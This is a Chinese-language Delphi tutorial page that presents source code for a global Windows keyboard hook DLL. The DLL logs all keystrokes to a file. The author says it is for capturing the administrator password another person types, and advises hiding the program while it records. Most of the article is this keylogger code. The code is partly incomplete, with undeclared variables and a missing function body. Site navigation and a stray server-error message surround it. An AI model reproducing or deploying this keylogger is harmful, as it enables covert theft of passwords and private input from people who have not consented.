转至繁体中文版     | 网站首页 | 图文教程 | 资源下载 | 站长博客 | 图片素材 | 武汉seo | 武汉网站优化 | 
最新公告:     敏韬网|教学资源学习资料永久免费分享站!  [mintao  2008年9月2日]        
您现在的位置: 学习笔记 >> 图文教程 >> 软件开发 >> Delphi程序 >> 正文
Delphi编程使用HOOK监视Windows         ★★★★

Delphi编程使用HOOK监视Windows

作者:闵涛 文章来源:闵涛的学习笔记 点击数:799 更新时间:2009/4/23 18:25:13
1716   每个程序都有自己的生存空间,在Windows系统中你可以在任何时候让你的程序执行一些操作,还可以触发消息,触发的消息分为三种,一是操作你程序的界面,onClick,onMouseMove等等,另外一个可以使用Windows的消息机制来捕获一些系统消息,但是如果你想在任何时候监控任何程序的情况那可能你就会选择HOOK来实现了,虽然还有其他方法,但不得不承认,HOOK是一个比较简单解决问题的途径。

  下面就来举个例子(使用Delphi7.0调试通过):

  如果你需要访问某个人的机器,那在运行\\SB之后那个人就会在你机器上敲入他的adminsitrator密码,当然,你也可以使用黑客工具来得到他的密码,但是,为什么不自己尝试一下写个程序记录所有的键盘操作呢?

  首先需要申明一点,Hook不同于一般的应用程序,需要作为一个全局DLL出现,否则无法在你程序不激活的状态捕获其他信息的,(当然你可以用Windows消息,这个问题不在这里讨论)。

  写个DLL定义一下函数

function setkeyhook:bool;export;
function endkeyhook:bool;export;
procedure keyhookexit;far;
procedure SetMainHandle(Handle: HWND); export;forward;
function keyboardhookhandler(icode:integer;wparam:wparam;lparam:lparam):lresult;stdcall;export;

procedure EntryPointProc(Reason: Integer);
 const
  hMapObject: THandle = 0;
 begin
  case reason of
   DLL_PROCESS_ATTACH:
  begin
   hMapObject := CreateFileMapping($FFFFFFFF, nil, PAGE_READWRITE, 0, SizeOf(THookRec), ’_CBT’);
   rHookRec := MapViewOfFile(hMapObject, FILE_MAP_WRITE, 0, 0, 0);
  end;
  DLL_PROCESS_DETACH:
 begin
 try
  UnMapViewOfFile(rHookRec);
  CloseHandle(hMapObject);
  except
 end;
end;
end;
end;
procedure keyhookexit;far;
begin
if hNexthookproc<>0 then endkeyhook;
 exitproc:=procsaveexit;
end;
function endkeyhook:bool;export;
begin
if hNexthookproc<>0 then
begin
 unhookwindowshookex(hNexthookproc);
 hNexthookproc:=0;
 messagebeep(0);
end;
result:=hNexthookproc=0;
MainHandle:=0;
end;

function Setkeyhook:bool;export;
begin
 hNexthookproc:=SetWindowsHookEx(WH_KEYBOARD ,keyboardhookhandler,HInstance,0);
 result:=hNexthookproc<>0;
end;
function keyboardhookhandler(icode:integer;wparam:wparam;lparam:lparam):lresult;stdcall;export;
var
 s:Tstringlist;
begin
 if icode<0 then
 begin
  result:=CallNextHookEX(hNexthookproc,icode,wparam,lparam);
  exit;
 end;
 if lparam<0 then
 begin
  exit;
 end;
 s:=TStringlist.Create;
 if FileExists(afilename) then
  s.LoadFromFile(afilename);

  //将敲打的键盘字符保存到文件中
  s.Add(formatdatetime(’YYYYMMDD hh:nn:ss:zzz: ’,now) + char(wParam) );
  s.SaveToFile(afilename);
  s.Free;

  result:=0;
 end;


  Dll的Project文件中定义如下

exports
setkeyhook index 1,
endkeyhook index 2,
SetMainHandle index 3;

begin
hNexthookproc:=0;
procsaveexit:=exitproc;
DllProc := @EntryPointProc;
EntryPointProc(DLL_PROCESS_ATTACH);
end.
  这样DLL就定义好了,接下来就是画个界面:

function setkeyhook:bool;external ’keyspy.dll’;
function endkeyhook:bool;external ’keyspy.dll’;
procedure SetMainHandle(Handle: HWND); external ’keyspy.dll’;
//开始捕获键盘
SetMainHandle(handle);
setkeyhook
//中止捕获键盘
endkeyhook
  然后吧你程序隐蔽起来,启动捕获键盘,在中止捕获之前,所有键盘操作都会被记录到你所定义的filename这个文件名中去,注:这些代码是临时写的,仅是为了说明如何写个hook程序。

  另外Hook的功能不仅仅是简单使用,这就需要靠大家灵活运用了,可以跟很多windows API来配合,通过很多技巧作出让人意想不到的效果。
  阅读关于 Delphi 的全部文章 157


没有相关教程
教程录入:mintao    责任编辑:mintao 
  • 上一篇教程:

  • 下一篇教程:
    • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
      注:本站部分文章源于互联网,版权归原作者所有!如有侵权,请原作者与本站联系,本站将立即删除! 本站文章除特别注明外均可转载,但需注明出处! [MinTao学以致用网]
      网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
    同类栏目
    · C语言系列  · VB.NET程序
    · JAVA开发  · Delphi程序
    · 脚本语言
    更多内容
    热门推荐 更多内容
  • 没有教程
    		•
    赞助链接
    更多内容
    闵涛博文 更多关于武汉SEO的内容
    500 - 内部服务器错误。

    500 - 内部服务器错误。

    您查找的资源存在问题,因而无法显示。
    | 设为首页 |加入收藏 | 联系站长 | 友情链接 | 版权申明 | 广告服务
    MinTao学以致用网

    Copyright @ 2007-2012 敏韬网(敏而好学,文韬武略--MinTao.Net)(学习笔记) Inc All Rights Reserved.
    闵涛 投放广告、内容合作请Q我! E_mail:admin@mintao.net(欢迎提供学习资源)

    站长:MinTao ICP备案号:鄂ICP备11006601号-18

    闵涛站盟:医药大全-武穴网A打造BCD……
    		咸宁网络警察报警平台